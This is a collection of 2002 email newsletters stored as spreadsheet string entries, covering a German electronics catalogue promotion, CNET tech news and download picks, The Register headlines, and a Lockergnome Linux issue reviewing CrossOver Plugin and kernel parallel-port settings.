Breitband-TV: Wir prÃ¤sentieren Ihnen die 
absoluten High-Tech-Hits von SONY, Denon, 
JVC, Panasonic, Toshiba und vielen anderen 
Top-Marken. SelbstverstÃ¤ndlich zu 
atemberaubend gÃ¼nstigen Preisen!
Software-Shop Â– fÃ¼r mehr Vielfalt und 
mehr Innovation 
Ob Betriebssystem oder Office-Suite, DTP 
oder Multimedia, Video-Bearbeitung oder 
aktuelle Games: Wir bieten Ihnen die perfekte 
LÃ¶sung fÃ¼r jede denkbare PC-Anwendung. 
NatÃ¼rlich inklusive Update- und 
Schulversionen sowie top-aktuellen 
HandbÃ¼chern fÃ¼r Einsteiger und Profis!
Welche DVD-Formate gibt es? Wie funktioniert eine Wireless LAN-Verbindung? Diese und 
viele weitere Fragen werden geklÃ¤rt. Wenn Sie noch keinen Katalog besitzen, dann bestellen 
Sie schnell und nehmen Sie sich etwas Zeit fÃ¼r die neuesten Produkte der Technik.
FÃ¼r Ihre Kataloganforderung erhalten Sie von uns einmalig
einen Warengutschein in HÃ¶he von 5 EUR.Bitte registrieren Sie sich hier: 
Â 
MÃ¶chten Sie diese Mail weiterleiten dann klicken Sie hier
Â 
Â Wenn Sie den Newsletter nicht mehr erhalten wollen, mÃ¼ssen Sie sich 
komplett vom Fax2Mail Service abmelden. Gehen Sie hierzu auf 
http://f2m.xpedite.de Im Bereich 'Setup' kÃ¶nnen Sie sich Ã¼ber 
den Knopf 'Daten lÃ¶schen' abmelden. Mit freundlichen GrÃ¼ÃŸenIhr F2M Team
Dies ist ein Service der XPEDITE Systems GmbH verschickt Ã¼ber das
messageREACH-System.
Weitere Informationen finden Sie unter http://f2m.xpedite.de</t>
  </si>
  <si>
    <t>Hallo Xxxxxxxxx Yyyyyyy,HEUTE,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jobfair24!Also kommen Sie vorbei, wir freuÂ´n uns!
Ihr jobfair24-Team--------------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
  </si>
  <si>
    <t xml:space="preserve">Cable companies cracking down on Wi-FiÂ Search
	                Â 
	                Â 
News.com
	                All CNETÂ Â Â Â 
	                The Web
                Â Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoftJuly 9, 2002Cable companies cracking down on Wi-FiApple's iPod comes to LinuxTalk of Dell printer move heats upMicrosoft eyes Visa users with PassportJudge OKs suit against Kazaa parentChina wakes to new destinyÂ Vision Series			Read News.com's exclusive interviews of 10 top CIOs, including IBM's Phil Thompson.
Vision Series home
Cable companies cracking down on Wi-FiBroadband providers are cracking down on popular Wi-Fi networks, threatening to cut service to customers who set up the inexpensive wireless systems and allow others to freely tap into their Internet access.
Time Warner Cable of New York City has given 10 customers less than a week to stop using their accounts to provide a wireless local area network available to anyone within 300 feet. The letters are just an initial volley; Time Warner expects to send additional letters, while AT&amp;T Broadband also is preparing similar letters for some of its customers.
July 9, 2002, 4:00 AM PT
 | Read Full Story Apple's iPod comes to LinuxWindows users have recently been given access to the popular Macintosh music player, iPod, and now Linux users may soon be able to take a bite out of Apple Computer's gadget. Last week, tex9, a small software-development company in San Francisco, began beta testing an iPod plug-in for its xtunes music player software, which is itself a Linux clone of Apple's iTunes. The plug-in will, tex9 promises, allow drag-and-drop access to iPod, which holds up to 10GB of music.
July 9, 2002, 12:00 PM PT
 | Read Full Story Talk of Dell printer move heats upDell Computer appears to be moving toward selling its own printers.
A pair of analyst reports issued Tuesday added to a torrent of recent speculation that the Round Rock, Texas-based PC maker's next move will be into the printer market. Dell has plunged into a number of new markets over the past few years.
July 9, 2002, 12:30 PM PT | Read Full Story 
Microsoft eyes Visa users with PassportMicrosoft hopes to extend its Passport online identification system into authorizing credit card payments.
The software giant will strike a partnership Tuesday with security-software maker Arcot Systems, which builds online payment systems for merchants and for banks that issue Visa and MasterCard credit cards. Arcot makes the systems behind Visa's own Verified by Visa program as well as a similar program in development at MasterCard.
July 8, 2002, 9:00 PM PT
 | Read Full Story Judge OKs suit against Kazaa parentA federal judge said Monday that record labels and film studios could expand an ongoing copyright lawsuit to include Sharman Networks, which distributes the popular Kazaa software.The Recording Industry Association of America (RIAA) and the Motion Picture Association of America (MPAA) sued three prominent file-swapping companies in October in Los Angeles federal court. The suit named Morpheus parent StreamCast Networks, Grokster and Kazaa BV, the Netherlands-based company that originally created the Kazaa software.
July 9, 2002, 12:55 PM PT
 | Read Full Story China wakes to new destinyGlobal slump prompts tech titans to tap the sleeping giant's manufacturing prowess and consumer market.
July 9, 2002, 4:00 AM PT
 | Read Full Story 
From our partners:Another big charge for AOL?Business Week
It may again have billions of excess goodwill on its books, and a write-down won't go over well with already unhappy investors.
July 9, 2002
 | Read Full Story Business needs to take the blinders offBusiness Week
Today's corporate apologists are too much like the Marxists who reflexively defended Communism's old poster boy -- Stalin.July 9,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Netscape 7: How does it stack up?
CNET Download.com's Rex Baldazo previews Netscape 7, a new open-source version of the browser that the company hopes will chip away at Microsoft's leading position with Internet Explorer.
 Watch Video
Â Â EnterpriseShares in chip gear fall on new fearsDell douses Lexmark speculationMicrosoft tests dressed up Web softwareE-BusinessStocks edge lower after Bush speechBush talks tough on corporate fraudVignette's forecast dips on demand woesCommunicationsWorldCom: The clock is tickingDeutsche Telekom up on CEO talksNTT DoCoMo tries new 3G twistMediaVivendi units harmonize in digital dealAOL Time Warner secures new creditBanks bail out Vivendi with loansPersonal TechnologyIt ain't heavy; it's my laptopMatsushita: Chip unit headed toward blackFrench game maker up on Sega rumors        Â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</si>
  <si>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
Shopper Newsletter: Alerts
Live tech help NOW!
April's tech award
1 million open jobs
News.com: Top CIOs 
ZDNet: PeopleSoft July 9, 2002 
From Computers4SureSave an extra $50 on the iPaq 3835 PDA.
 From Dell Enter to win your chance to win $50,000 from Dell!Computers4Sure
iPaq 3835 Pocket PC  
								â€¢ $50 rebate  
â€¢ 64 MB, brilliant TFT screen
â€¢ 206 MHz Intel processor
								Â Â Just $549 after rebate
Cyber-shot Digital Camera DSC-P51
								â€¢ Free shipping
								â€¢ 2-megapixels, 1280x960 res.
								â€¢ 2x optical zoom/3x digital zoom
								Â Â Just $300
Maxtor DiamondMax D540X 160GB
								â€¢ Outstanding capacity &amp; value
								â€¢ 2MB buffer, Avg. Seek 12ms 
								â€¢ 5400 RPM, Ultra ATA/133 
							    Â Â Just $260
 Dell
$50K-a-day Giveaway from Dell Home Systems. . .
Buy any new Dell Home System on or before July 31, 2002 and you'll
be automatically entered to win $50,000. The next lucky winner
could be you!More rules and info
Dell Dimension 4000 series 
								â€¢ 1.7 GHz to 2.53 GHz P4
								â€¢ 128 MB to 1 GB RAM
								â€¢ Up to 120 GB hard drive
								Â Â Starting at $689
Dell Dimension 8000 series
								â€¢ 1.8 GHz to 2.53 GHz P4
								â€¢ 128 MB to 2 GB RAM
								â€¢ Up to 120 GB hard drive
								Â Â Starting at $919 The e-mail address for your subscription isÂ qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org
UnsubscribeÂ |
Â Manage My Subscriptions
Â |Â FAQÂ |
Â Advertise        Copyright 2002 CNET Networks, Inc. All rights reserved.          .</t>
  </si>
  <si>
    <t xml:space="preserve">CNET | DOWNLOAD DISPATCH(Mac Edition)
July 9, 2002
Vol. 7, No. 27Using a Mac and today's music software, musicians are finding
that they can create, record, and master their songs without
the need to pay for expensive studio time. Deck, our Pick of
the Week, offers a multitrack audio workstation that can take 
care of all your recording needs, and it's even optimized for 
OS X. Not just great for music, Deck can be used for film, video,
and numerous other applications. Get on Deck:http://clickthru.online.com/Click?q=ca-iciuQUgFRLpNVUXcl8jfOfRHHUnR Also this week, we've got Captain FTP, for an easy way to
transfer files; AquilaCalendar, to get you organized under OS X;
Tex-Edit Plus, a full-featured alternative to the pricier
text editors; and Boom, a remake of one of the great classic
arcade games.Enjoy!Jason Parker
Assistant Editor, CNET Download.com
--(Unsubscribe instructions are at the bottom of this
newsletter.)&lt;---------------Advertisement---------------&gt;Gateway Thin &amp; Light PCs - starting at $1,499!Thin and Light, the Gateway(R) 450 blends price, performance,
and portability.  Systems include Mobile Intel(R) Pentium(R)
4-M processors, 14.1" and 15" XGA TFT Active Matrix display 
options, and your choice of operating systems.http://clickthru.online.com/Click?q=df-1kJhQLEFHEClWsofbQq-Kh1XhaeR &lt;-------------------------------------------&gt;IN THIS ISSUE:1. This Week's Top 10 Downloads
2. Pick of the Week: Deck
3. The Week in Wares:
             - Internet: Captain FTP
             - Home and Education: AquilaCalendar
             - Development Tools: Tex-Edit Plus
             - Games: Boom
4. Updates &amp; Drivers
5. The Week in Reviews: Mac OS X 10.1 prices
6. Overheard on Download.com
7. Download.com Outage NoticeP.S. Got a suggestion for CNET Download.com? Send it to:
suggestions@download.com
_____________________________________________________________1. This Week's Top 10 Downloads   1. LimeWire 2.4.4                         5,715 downloads
   2. MacSatellite  1.6.1                    4,402 downloads
   3. LimeWire (OS X) 2.4.4                  4,043 downloads
   4. Hotline Connect Client 1.8.5           3,690 downloads
   5. RealPlayer 8.0                         2,730 downloads
   6. Sound Studio 2.0.3                     2,690 downloads
   7. Internet Explorer 5.1.4                1,949 downloads
   8. Fetch 4.0.1                            1,914 downloads
   9. OmniWeb (OS X) 4.1                     1,732 downloads
  10. DivX for OS X 1.1.8                    1,602 downloadsFor more details on Download.com's most popular files, click
here: http://clickthru.online.com/Click?q=f5-lTbRQgwx12_yoFk6DmLwgkaZmRPR 
______________________________________________________________2. Pick of the Week   DECK
   Version: 3.5
   File size: 6.6MB
   License: Free to try; $399.00 to buy
   Minimum Requirements: Mac OS 9.x or Mac OS X   Looking for a professional, multitrack audio workstation
   under OS X? This entry from BIAS, while maybe not the most
   attractive Mac app on the block, gives you some hefty
   editing functionality--whether you're working in broadcast,
   film, video, or any other multimedia environment. The big
   brother to BIAS' cheaper Deck LE, Deck 3.5 lets you process
   soundtracks, edit dialogue, spot effects, and record
   ADR-style voice-overs. Deck also supports surround mixing and
   up to four real-time effects plug-ins per track for music
   production. A good value, and one of the first of its kind
   to hit OS X, this midrange app deserves a listen. You're on
   Deck:   http://clickthru.online.com/Click?q=0a-ZnKCIrrscnFX3e0Bwhq6GOxuYznR    Want to review Deck? Submit your opinion here:
   http://clickthru.online.com/Click?q=1f-rvwqI58w5yO75pM1xmYgHobjqmeR    Find all of our Picks here:
   http://clickthru.online.com/Click?q=34-pJpSIcd819N9rTb3_tvVyn4IcgyR 
______________________________________________________________3. The Week in Wares   IN INTERNET:   CAPTAIN FTP
   Version: 1.3
   File size: 793K
   License: Free
   Minimum requirements: Mac OS X   Designed completely from scratch to work with OS X, Captain
   FTP is a new client that makes finding, uploading, and
   downloading files online easier than ever. Since it makes
   full use of OS X's multithreaded multitasking capabilities,
   you can set up as many simultaneous connections as you like
   without slowing down other work on your Mac too much. The
   program supports drag-and-drop operation and resuming
   interrupted downloads. It also sports a built-in address
   book, and integrated BBEdit links. The interface deserves
   awards for clarity and good looks. Grab files in style:   http://clickthru.online.com/Click?q=49-ZM4cIEpSenMA07qVX4RVXFO5JSFR    Want to review Captain FTP? Submit your opinion here:
   http://clickthru.online.com/Click?q=5e-ssGdIn06tVeUdrZhsnStcVTQzc9R    Find all of the latest Internet software here:
   http://clickthru.online.com/Click?q=73-__ZeIBBtWIiA9y3T8UEE0WNrUZcR 
   IN HOME AND EDUCATION:   AQUILACALENDAR
   Version: 1.19
   File size: 1.63MB
   License: Free to try; $20.00 to buy
   Minimum Requirements: Mac OS X   One of the most frustrating things about off-the-shelf
   organizer applications is that they try to force everyone to
   keep track of things in the same way. AquilaCalendar is
   refreshingly different: you can design your own calendar
   windows, choosing from a plethora of basic options (day,
   week, month, year, several months together, and so on), customize
   your calendar with colors and fonts, and more. To-do lists
   and notes-to-self can be added to calendars or you can add a
   handy clock and holiday markers, among other options. The
   interface fits with the OS X design theme, and makes getting
   organized no more difficult than it has to be. Get organized:   http://clickthru.online.com/Click?q=88-ec5PQQKx6IOkSTY-rU358atSBbiR    Want to review AquilaCalendar? Submit your opinion here:
   http://clickthru.online.com/Click?q=9e-tWQoQtMQJGrFWgHHSCN0U7nQUD4R    Find all of the latest home and education software here:
   http://clickthru.online.com/Click?q=b3-QHzxQYKTqehBCndAE64qDAwrPGrR 
   IN DEVELOPMENT TOOLS:   TEX-EDIT PLUS
   Version: 4.1.3
   File size: 1.17MB
   License: Free to try; $15.00 to buy
   Minimum Requirements: System 7.x   Before you spend the big bucks on a HTML editor, make sure
   you check out Tex-Edit Plus. This handy little editor offers
   all the basics like unlimited Undo and Redo commands,
   translucent drag-and-drop capabilities, several text styles,
   and the option to highlight selected text. Also, you'll be
   able to use it to act as a text editor for an FTP client
   such as Fetch, Interarchy, NetFinder, or Transmit. Text
   editing made easy:   http://clickthru.online.com/Click?q=c8-2lPnQWOzdD19YnmMKE-nFr99H2iR    Want to review Tex-Edit Plus? Submit your opinion here:
   http://clickthru.online.com/Click?q=dd-tpm0QzWd3Dhh1zgGZP85eXsJh-PR    Find all of the latest utilities here:
   http://clickthru.online.com/Click?q=f2-OZVTQUwWCeG9s_A0pvVdi5Z7ednR 
   IN GAMES:   BOOM
   Version: 1.3
   File size: 2.3MB
   License: Free to try, $15 to buy
   Minimum Requirements: Mac OS 8.x/OS 9.x/OS X   Remember the classic arcade game Bomberman? Even if you
   don't, you should take this remake of the old classic for a
   spin. Maneuver your way through a maze of corridors while
   setting off bombs to clear a path for your escape. You'll
   also need to pick up coins for extra points and stay clear
   of those nasty aliens to stay alive. Blast your way through
   eight alien-infested areas, each one divided into 10
   subzones, and kick the Big Alien Boss back to where he came
   from. Blast away:   http://clickthru.online.com/Click?q=07-HqCzI5rq9T_hx8KiqzUbrvLkiDeR    Want to review Boom? Submit your opinion here:
   http://clickthru.online.com/Click?q=1c-cs_iIFr43mGGwPjn9kgGa2oXqGyR    Find all of the latest games here:
   http://clickthru.online.com/Click?q=32-Gx5IIrQ6j3J9vREDFWVhZSgRXBnR ______________________________________________________________4. Updates &amp; Drivers: Stay on Top of Bug Fixes and New Features   IN INTERNET:   - DupliMizer 2.4 
     http://clickthru.online.com/Click?q=47-ADmxIIZH1jE333KOiJGu_NEsnEuR    - Web Site Maestro 1.2
     http://clickthru.online.com/Click?q=5c-BnjPIZnPblJYt8W53xlZk0f-IosR    - Surfer 2.0
     http://clickthru.online.com/Click?q=71-GwdUIEZcfHewddAqwuBXvl3NU2FR 
   IN MULTIMEDIA &amp; DESIGN:   - Photo Album Builder 1.2
     http://clickthru.online.com/Click?q=86-8fH1QCJonnxDZ9JSjaeTldfVpf4R    - Cartoon Editor 1.2.1
     http://clickthru.online.com/Click?q=9b-7-TFQSIo2p0Ld1d0dAVJ9PZAKTrR 
   IN UTILITIES:   - Battery Endurance Measurer 1.3
     http://clickthru.online.com/Click?q=b0-NZmfQQJr-SlQoW6dxQMKtNX8PQiR    - Pixel Tester 2.0
     http://clickthru.online.com/Click?q=c5-8BcDQzOaF-iJTk_zSROUJEymxqPR    - SerialStorage 1.0
     http://clickthru.online.com/Click?q=da-dT8jQUPq_nOG5djbjsMVKpv3DxnR 
   IN BUSINESS AND FINANCE:   - Gym Organizer 6.5
     http://clickthru.online.com/Click?q=ef-04uYQmkHvFhT_HKqBxDVAmoBameR    - ChartConstructor 1.0.1
     http://clickthru.online.com/Click?q=04-k9W0IFQXFQMPpsA98BbBL7kOi_yR 
   IN HOME AND EDUCATION:   - WeatherMan 1.6
     http://clickthru.online.com/Click?q=19-BLe0I2rXOrA0zLlKMZ2Fz8IR7XlR    - Computer Cuisine Deluxe 3.1
     http://clickthru.online.com/Click?q=2f-hYaFIqnzAaNFrW5P26D_8gaZjMeR 
_______________________________________________________________5. The Week in Reviews:   Mac OS X 10.1 prices   If you haven't made the switch to Apple's beautiful and
   powerful operating system, check out these prices, which may
   change your mind.   http://clickthru.online.com/Click?q=44-9nxfIZUtYM5fxvgEMLKlXBDgnVsR 
_______________________________________________________________6. Overheard on Download.com   Here are some user comments about an alternative MP3 player
   for the Mac:   "Small, Low CPU Usage, Easy"   "Excellent Alternative"   "Neat, discreet, powerful"   "It blows my mind!"   "One of the best to date!"   So what's the name of this mystery download? Click here to
   find out:   http://clickthru.online.com/Click?q=59-y53oIEnthMZswNYlpW-B_KMqztFR 
_______________________________________________________________The e-mail address for your subscription is qqqqqqqqqq-zdnet@spamassassin.taint.orgTo sign up for more CNET newsletters, click here:
http://nl.com.com/servlet/url_login?email=&amp;brand=cnetTo unsubscribe, click here:
http://clickthru.online.com/Click?q=6e-2aLjz4Er1KcnmbRj35jce-nUPINqj9RRTo receive your newsletter in HTML format, click here:
http://nl.com.com/servlet/url_login?email=&amp;brand=cnetFor the CNET Newsletters FAQ, click here:
http://clickthru.online.com/Click?q=83-U-BXQYJ7lFvC8zVtuoAABMMPZ9rR To learn about advertising opportunities in CNET Newsletters, click here:
http://clickthru.online.com/Click?q=98-FTaOQ_zabmh0qdlCW5CH7esbKRiR 
Copyright 2002 CNET Networks, Inc. All rights reserved.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</si>
  <si>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EU report calls for widespread open source adoption
    The only way for governments to share software and save money, it says
        http://www.theregister.co.uk/content/4/26102.html    MS poised to announce .NET Server RC1?
    The entrails look promising...
        http://www.theregister.co.uk/content/4/26100.htmlEnterprise Systems    HP releases Itanium 2 benchmark data
    Timp goes mad on benchmarks...
        http://www.theregister.co.uk/content/53/26095.htmlSemiconductors    HP roadmaps Itanium futures as McKinley debuts
    HP goes mad on mountain themes...
        http://www.theregister.co.uk/content/3/26097.html    HP releases Itanium 2 benchmark data
    Timp goes mad on benchmarks...
        http://www.theregister.co.uk/content/3/26095.htmlInternet    BT Retail to flog 24/7 Net access
    All Together now...
        http://www.theregister.co.uk/content/6/26107.html    WorldCom takes the Fifth
    They'll need it
        http://www.theregister.co.uk/content/6/26106.html    Web site censored over pictures of traffic wardens 
    Meter maids 'harassed, alarmed and distressed'
        http://www.theregister.co.uk/content/6/26104.html    P45s for Porn Surfers 
    Net 'misuse' sackings on the rise
        http://www.theregister.co.uk/content/6/26098.htmlBusiness    WorldCom takes the Fifth
    They'll need it
        http://www.theregister.co.uk/content/7/26106.html    Sun shines on Scots job market
    StarCat production transferred to Silicon Glen
        http://www.theregister.co.uk/content/7/26105.html    Buffet and friends sub Level 3 $500m for acquisitions
    Chap 11 to predator in 60 seconds...
        http://www.theregister.co.uk/content/7/26096.html    ROI faulty as measurement of IT success - survey
    Sums don't always add up properly
        http://www.theregister.co.uk/content/7/26094.htmlNetworks    Mitel cuts staff hours to pare payroll
    10% less work, 10% less pay
        http://www.theregister.co.uk/content/5/26109.htmlBroadband    Europe unhappy over local loops 
    Legal action looming
        http://www.theregister.co.uk/content/22/26103.html    Broadband users called to protest against BT
    People power to take on 'crap service'
        http://www.theregister.co.uk/content/22/26099.htmlThe Mac Channel    Celebrity Apple cronies silent on community expulsions
    Pass the cake        http://www.theregister.co.uk/content/39/26110.htmlBOFH: Whole Shebang    The Bastard Vending Machine
    Episode 15 Nasty Cola
        http://www.theregister.co.uk/content/30/26111.htmlAbout The Register    Here Comes the Sun, da da da da
    It-minds hot cup of Java beats the summertime blues
        http://www.theregister.co.uk/content/31/26101.htmlBootnotes    Why Microsoft C# is 'paralysed or dead'
    Letters The C Octothorpe Blues 
        http://www.theregister.co.uk/content/28/26108.html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</si>
  <si>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20020709 Lockergnome Penguin ShellÂ  07.09.2002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today!I don't usually spend much time explaining metaphors. They are, after all, 
metaphorical. They can be filled with whatever symbolism you choose. Written 
well, we all come to some similar understanding of their meaning. But, I'll 
depart today, contrary to my normal practice, to take a few minutes explaining a 
recent metaphor.I'm a Linux guy through and through. As a user, I see myself as right about at 
the average on the curve. For love of the language and open source attitude, 
though, you'd be hard-pressed to find anyone with quite the same level of 
enthusiasm. Put simply, there's very little about the Linux and broader open 
source worlds that I don't like or believe in.Take, for example, the practice of recursive acronyms. GNU ("Gnu's Not Unix"), 
HURD ("Herd of Unix-Replacing Daemons"), WINE ("Wine Is Not an Emulator"), even 
PHP ("PHP Hypertext Processor") - all carry on the tradition of recursion in the 
Unix/Linux world. Goofy as it sounds, I love this stuff.So it is that I set out to create a recursive metaphor last week. It could only 
have happened on or about the 4th of July. In fact, it happened in the edition 
of the 3rd. I wrote a piece about how we Americans spend more time over the 
course of a year talking about what's wrong with our system than what's 
right. I wrote it knowing full well that many of the responses I'd get would be 
a) from readers outside the US and b) in sharp disagreement to my comments or 
those of citizens of other countries. You're following me, right? People would 
disagree with an article that said we spend much time disagreeing. This, of 
course, would prove my point in a somewhat metaphorical way - the perfect 
recursive metaphor. The point was to be made yet more perfectly by the eventual 
inclusion in Penguin Shell of the comments of someone from outside the US 
disagreeing with my take our argumentativeness as Americans. Ideally, they would 
be comments that disagreed with our collective American perception of being 
disagreeable. They would, of course, point out things about which citizens of 
other countries can disagree with Americans on. By exercising the right to 
disagree, we'd subtly agree that we have that right. Yet another level of 
recursion and a final layer of metaphor.The response to both my own and Johan Sauviller's comments was overwhelming. In 
the main, I believe both were appreciated. Many commented on the balance of the 
two pieces. Some readers were surprised, I think, to see a dissenting opinion 
published so quickly, if at all. Overall, the ability to express honestly held 
opinions, to agree and to disagree on a global level closed the circle on the 
metaphor in a perfect way.Things have, however, gotten a bit more ugly in the past few days. I'm not sure 
whether some were slow in getting to the July 3rd issue, or whether it's just 
been stewing since then. Take, for instance, these comments by a reader who will 
remain mercifully nameless:
We get enough
America bashing from our left-wing whacko extremist press and schools here
in the USA that we don't wish to hear some (insert favorite adjective here)
from Belgium whining too!
Followed by:
... please don't let Tony single-handedly tarnish the fine reputation
of Lockergnome. I'm sure there are other articulate Linux experts out there who 
would be able to replace him.
... and, in a later note on the topic ...
Censorship is to be encouraged in a
free-market society whenever and wherever it doesn't come from the
government.
Clearly, the metaphor just whizzed right over the heads of some.
Chris 
has been great about allowing all his authors plenty of room in the editorial 
piece at the beginning of each newsletter. This particular piece is no 
exception. He's shown a quiet confidence in the face of some very shrill 
comments. While we all generally stay focused on technical issues, Chris has 
shown unwavering support for the notion that we geeks are, in the end, humans 
with opinions and thoughts to share. I think it's one of the things that makes 
the Lockergnome newsletters stand out from the pack - the personal touch.So, despite the irrationality of some of this week's comments, I'll continue to 
occasionally throw in a personal aside with the technical stuff.Just watch out. Recursive metaphors are only funny until someone puts an eye 
out.
Tony
Steidler-DennisonÂ Â Â Â Â Â Â Â GnomeTWEAK
Lockergnome readers, SAVE 50% on the Computing Encyclopedia!
Are you looking for the ultimate computing resource? Discover the
Computing Encyclopedia from Smart Computing.  Regular price $59,
SPECIAL OFFER for Lockergnome readers,
get 
your set TODAY, ONLY $29.95!Win Apps in Linux?Yesterday, I mentioned an interesting review of two products for Linux by CodeWeavers - CrossOver 
Office and CrossOver Plugin. You've probably heard of both by now, as they've 
garnered quite a bit of publicity both in and out of the Linux world. You'll 
recall that I promised to try to secure copies for review this week. With the 
help of a friendly sales rep at CodeWeavers, I was able to accomplish that task 
this morning. True to the second half of the promise, we'll spend the next few 
days looking at these two products and how they might impact your Linux use. 
Let's take them in chronological order, starting today with CrossOver Plugin.A bit of background is in order. CodeWeavers is, in their own words, " ... the 
leading corporate backer of the Wine Project. Wine has been, for the past several years, an 
ongoing project to port Windows applications to Linux. It's a tough goal, but 
it's also one that's been undertaken by others in the past year or so. Though the progress has been 
slow, the Wine project has managed to stay at the front of this development 
realm.
CrossOver 
Plugin marks a change in the philosophy of the Wine Project. Prior to its 
release, Wine had taken a "full system" approach. Running Windows applications 
in Wine required the installation of a sizeable daemon and no small amount of 
configuration work. CrossOver Plugin has moved Wine away from the system-wide 
approach to one that's much more modular. Rather than executing at system 
startup, Wine is called as-needed, with the virtual Windows path to the called 
program. When the program is closed, so is Wine. CrossOver Plugin has focused on creating Linux functionality with one related set of Windows 
applications: browser plugins.The results stand as a clear indication that the change in philosophy is a 
success. Off the top, CrossOver Plugin bundles QuickTime 5, Windows Media Player 6.2, Shockwave 8.5, Flash 6, and RealPlayer 8 into a Linux-accesible browser 
plugin package. Throw in more esoteric apps like IPix, Trillian, Authorware Web 
Player 6 and eFax Messenger 2, and you've got virtually every need plugin need 
covered.But this package doesn't stop there. Included in the CrossOver Plugin package 
are viewers for Word, Excel and Powerpoint, as well as several 
Microsoft-oriented fonts. Honestly, I was stunned at the range of applications 
offered by the CodeWeavers developers.Having had some experience with Wine, I was a bit leery about the install 
process and about the ability to get all these great applications to work with 
my RedHat setup. I've never been completely successful with Wine, but I hoped 
for the best when I started the CrossOver Plugin installation. I really did want these apps to work.The installation was quite easy. By running the install-crossover.sh script from the command line, I was able to install the installers for both CrossOver Plugin and CrossOver Office, which we'll talk about tomorrow. I started the plugin 
installs with QuickTime, a tool I've admittedly missed in Linux. In the 
background, CrossOver Plugin had already created a virtual C:\ drive on my 
machine. I clicked on the QuickTime install and immediately saw a familiar sight - the Vise installer in its Windows format. CrossOver Plugin first checked for 
feedback from the Windows binary, opened a virtual Windows window, then stepped 
out while the Vise installer took care of the rest. Though the install failed 
four times, it appeared to be a server failure rather than a failure of the 
CrossOver program. I kept "retry"ing and, with some persistence, managed to get 
a full QuickTime 5 install downloaded from the Apple servers. Quite literally, 
the install looked and performed exactly as I've seem many times in Windows. 
When the install was completed, CrossOver again checked for the Windows binary, 
located the appropriate .dll files in the virtual C:\ drive and dropped the 
plugins into the /home/tony/.netscape/plugins and /home/tony/.mozilla/plugins 
directories.The process was so smooth that I had to check the plugin listings in these 
browsers - "Help", "About Plugins." Sure enough, the CrossOver QuickTime plugin 
was listed. Quickly, I ran out to the Apple site and opened the "Men In Black 
II" movie trailer. QuickTime performed flawlessly.I followed with the Windows Media Player, Shockwave, Flash, IPix, and eFax 
Messenger installs. Of those, the only ones that weren't self-contained in the 
CrossOver install were IPix and eFax. Even at that, the installer pointed me to 
the Windows download then found the .exe file when the download was done. Within a half-hour, I had all installed and tested.Then, just for grins, I installed RealPlayer 8 via CrossOver. This was despite 
the recommendation in the installer screen to use the Linux version. It went as 
smoothly as the others with one caveat - the player played media files at a much faster speed than that in Windows. Fast enough to make me laugh, in fact, 
reminded of Dave and Alvin the Chipmunk. Ah well, six out of seven is pretty 
strong given my previous troubles with Wine.I also installed a few fonts - Arial, Times New Roman, Trebuchet, and Veranda. 
In every case, the install was quick and absolutely painless.Wine has always held great promise. At times, it's been painful to watch the 
tedious pace of development, only because that promise was so alluring. With the backing of CodeWeavers and a fundamental change in the approach to development, 
Wine has finally realized the goal of integrating Windows applications 
seamlessly into the stable Linux environment. The results are so strong that, if I didn't know better, I'd swear that a few of these plugins actually run better 
in Linux than in their native Windows. Honestly, I didn't realize how much I 
missed them until I started using them in Linux today.Tomorrow holds a few surpirses, with a look at CodeWeavers' CrossOver Office 
package.
Recommend It!
Send us a 
GnomeTWEAKÂ GnomeCORE
Kernel Configuration - Part IXWe're nine parts into the kernel configuration series, with quite a bit yet to 
go. If you haven't been following along, we're breaking out the configuration 
screens one at a time in an attempt to shed some light on the purpose and 
function of each. With that knowledge, you should be able to make a clear 
decision as to how to configure each section.Today, it's the Parallel Port support section. This is pretty simple. If you 
need parallel port support - such as for a printer - select this option either 
as a driver built into the kernel or as a loadable module.Most will use the PC-style hardware option in conjuction with a Windows printer. But that's not all the parallel port can be used for. As an example, the builds 
I did with the telescope company required parallel port support, as the 
telescope cameras were attached to this port.Be aware - this kernel configuration option only makes a driver available for 
the parallel port. The computer's BIOS sets the mode for the port - ECP, EPP, or Auto. On the majority of modern computers, the Auto mode is the default and will work just fine. However, if you have problems communicating with your printer 
following a kernel recompile, try changing the mode of your printer in the 
BIOS.Tomorrow, it's Plug and Play configuration.
Recommend It!
Send us a GnomeCORE 
tipÂ GnomeFILE
Netics 2.0http://www.citi.umich.edu/u/marius/netics/"Netics is an extensible network statistics collector. It puts the network 
interface in promiscuous mode and reads the data stream (after it strips off the appropriate protocol headers), then displays the results at specified intervals, either in a "progress bar" mode or as raw statistics. Currently, it supports 2 
statistics, both involving entropy: LZW compressability and Ueli Maurer's 
universal statistical test. Maurer's test is a very good and comprehensive 
measure of entropy, but requires a large amount of data. The LZW statistic 
requires much less data."
Recommend It!
Send us a GnomeFILE 
suggestionÂ GnomeVOICE
Helping Hand
Scribbled by Karl Steenblik"Dear Linux community at Lockergnome."I am the web master for largest health care camp in the State of Utah. 
No not Cancer camp it is the Diabetic camp."The Foundation for Children and Youth with Diabetes serves about 900
diabetic children a year and their families.  We have education, family
support, diet planning and most important is camp.  The place where kids
can learn about how to better manage their disease."We are a totally non profit camp that puts all money from fees into our
camp.  We pay no salaries to Physicians, Dietitians, Social Workers,
Nurses and educators that make our camp possible.  Yes even me the lowly
web master donates his time and web space at ATT to the cause."ATT recently decided to pull access to our photo page due to a password
protection.  We give out a password to all parents so that they can see
photos of camp while the sessions are happening.  We do not however what
the creeps of the web to have access to photos of our kids."We are looking for someone in the state to help our camp by donating web
space.  Now it may not be your organization, but I know Linux people and
Lockergnome and I think someone there may know someone who would be able
to help us."You can still have access to the public part of our site that ATT has not
shut down at www.fcyd-inc.org."Please I have the parents of 120 diabetic kids wanting to see photos of
their children.  They are all e-mailing me and I have no one to turn to."Hoping to hear from someone soon."Karl R Steenblik
Webmaster FCYD camp
Salt Lake City.
Help Karl.Recommend It!
Speak your 
GnomeVOICEÂ GnomeCLICK
Mobilix.org
http://mobilix.org/Mobilix.org is a full site related to using Linux on mobile devices, including 
PDAs and laptops. It includes information for subsctibing to the linux-laptop 
mailing list, information on Linux-powered wearable computers, WAP enabled 
access, and Linux on cell phones. Mobilix looks to be a great resource for all 
kinds of tips, tricks and useful information for taking your Linux on the 
road.
Recommend It!
Suggest a 
GnomeCLICKhttp://www.lockergnome.com/issues/penguinshell/20020709.html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Win a Digital Camera
Â General Feedback
Â Chris's Blog
Â E-mail the Editor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</si>
  <si>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20020710 Lockergnome Windows Daily
